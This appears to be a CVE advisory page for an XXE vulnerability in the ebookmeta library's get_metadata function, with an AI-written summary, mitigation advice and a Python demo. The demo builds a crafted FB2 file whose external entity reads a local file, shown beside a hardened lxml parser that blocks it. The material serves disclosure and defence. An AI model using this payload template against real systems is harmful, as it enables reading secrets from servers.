High severity · NVD Advisory · Published Jun 7, 2024 · Updated Oct 30, 2024

CVE-2024-37388

Description

An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of lxml before v4.9.1 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An XXE vulnerability in ebookmeta's get_metadata function due to insecure lxml XML parsing allows attackers to read sensitive files or cause DoS via crafted ebook files.

Vulnerability

Overview

CVE-2024-37388 is an XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of the ebookmeta Python library. The root cause is that the library hands untrusted ebook XML to lxml's parser without disabling external entity resolution, so an entity declared in the document's DTD with a SYSTEM identifier is fetched and its contents substituted into the parsed tree. The NVD description ties the exposure to lxml before v4.9.1 [1][3].

Exploitation

An attacker can exploit this vulnerability by supplying a specially crafted ebook file (e.g., an EPUB or FB2 file, both of which carry XML metadata) whose XML declares external entities and references them where metadata is read. The victim must process this file with the get_metadata function. No authentication is required beyond the ability to supply the file; the attack can be triggered locally or remotely wherever an application accepts user-uploaded ebook files [2][3].

Impact

Successful exploitation allows an attacker to read files from the server's filesystem that the process can open (information disclosure; as with any XXE, a file is only returned if its contents parse as entity text, so files containing raw `<` or `&` fail to expand), or to cause a denial of service (DoS) through entities that consume excessive resources, such as recursive entity expansion or entities that trigger external resource requests [1][3].

Mitigation

The advisory's patched package is ebookmeta 1.2.8, which includes a fix for the unsafe XML parsing; users should upgrade to 1.2.8 or later [2]. The NVD description additionally references lxml before v4.9.1, so keeping lxml current is advisable, but no application should rely on the parser's default entity handling: any code that feeds untrusted XML to lxml should build an explicit lxml.etree.XMLParser with resolve_entities=False, load_dtd=False and no_network=True (or parse through defusedxml), which removes the exposure on every lxml version. No other workarounds are documented [2][3].
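The exploitation and mitigation paths described above, as an added example that is not part of the original advisory or of ebookmeta's code: a constructed FB2 document declares an external entity whose SYSTEM identifier points at a local file, a title lookup through an lxml parser with entity resolution on returns that file's contents, and the same lookup through a hardened lxml.etree.XMLParser returns nothing. The FB2 skeleton, the secret file and the function names (build_malicious_fb2, book_title, has_dtd, demo) are all hypothetical.

```python
# Added example for this page: XXE through lxml entity resolution in an
# FB2-style ebook, beside the hardened parser that stops it. Illustrative
# code, not ebookmeta's implementation; every document, file and function
# name below is constructed for the demo.
import os
import pathlib
import tempfile

from lxml import etree

FB2_NS = "http://www.gribuser.ru/xml/fictionbook/2.0"

# Constructed FB2 document. The internal DTD subset declares an external
# entity with a file:// SYSTEM identifier, and the entity reference sits
# exactly where a metadata extractor would read the book title.
MALICIOUS_FB2_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE FictionBook [
  <!ENTITY xxe SYSTEM "{uri}">
]>
<FictionBook xmlns="{ns}">
  <description>
    <title-info>
      <book-title>&xxe;</book-title>
    </title-info>
  </description>
</FictionBook>
"""

# Constructed benign document with no DOCTYPE at all.
CLEAN_FB2 = """<?xml version="1.0" encoding="utf-8"?>
<FictionBook xmlns="{ns}">
  <description>
    <title-info>
      <book-title>Harmless Title</book-title>
    </title-info>
  </description>
</FictionBook>
""".format(ns=FB2_NS).encode("utf-8")


def build_malicious_fb2(target_path):
    """Return FB2 bytes whose <book-title> expands to the contents of target_path."""
    uri = pathlib.Path(target_path).resolve().as_uri()
    return MALICIOUS_FB2_TEMPLATE.format(uri=uri, ns=FB2_NS).encode("utf-8")


def vulnerable_parser():
    # Explicitly what a default XMLParser did in lxml 4.x: external entities
    # are fetched (file:// included; no_network only blocks http/ftp) and
    # substituted into the document text.
    return etree.XMLParser(resolve_entities=True)


def hardened_parser():
    # Keep entity references as nodes instead of expanding them, never fetch
    # an external DTD, block network fetches, and keep libxml2's expansion
    # limits (huge_tree=False) against billion-laughs style DoS.
    return etree.XMLParser(
        resolve_entities=False,
        load_dtd=False,
        no_network=True,
        huge_tree=False,
    )


def book_title(fb2_bytes, parser):
    """Stand-in for a get_metadata-style title lookup (not ebookmeta's code)."""
    root = etree.fromstring(fb2_bytes, parser=parser)
    node = root.find(".//{%s}book-title" % FB2_NS)
    # With entity resolution off, the reference survives as an entity child
    # node and .text is None: nothing from the filesystem reaches the caller.
    return node.text


def has_dtd(fb2_bytes):
    """True if the document carries a DOCTYPE. Ebook metadata never needs one,
    so rejecting such files up front is a cheap second line of defence."""
    root = etree.fromstring(fb2_bytes, parser=hardened_parser())
    return root.getroottree().docinfo.internalDTD is not None


def demo(secret=b"token=constructed-secret-value"):
    """Write a constructed secret file, then parse the crafted FB2 both ways.

    Returns a dict with the title seen through the vulnerable parser
    ("leaked"), through the hardened parser ("safe"), and whether the
    DOCTYPE check would have flagged the file ("dtd_flagged").
    """
    with tempfile.TemporaryDirectory() as workdir:
        secret_path = os.path.join(workdir, "secret.txt")
        with open(secret_path, "wb") as fh:
            fh.write(secret)
        crafted = build_malicious_fb2(secret_path)
        return {
            "leaked": book_title(crafted, vulnerable_parser()),
            "safe": book_title(crafted, hardened_parser()),
            "dtd_flagged": has_dtd(crafted),
        }


if __name__ == "__main__":
    result = demo()
    print("vulnerable parser read:", result["leaked"])
    print("hardened parser read:", result["safe"])
    print("DOCTYPE present:", result["dtd_flagged"])
```

The vulnerable branch only succeeds because the target file is plain text; the same trick against a binary file or one containing `<` fails to expand, which is why XXE data theft is usually aimed at configuration files, keys and tokens. The hardened parser options are set explicitly rather than inherited from lxml's defaults, so the code behaves the same on every lxml release.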

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package    Ecosystem    Affected versions    Patched versions
ebookmeta  PyPI         < 1.2.8              1.2.8
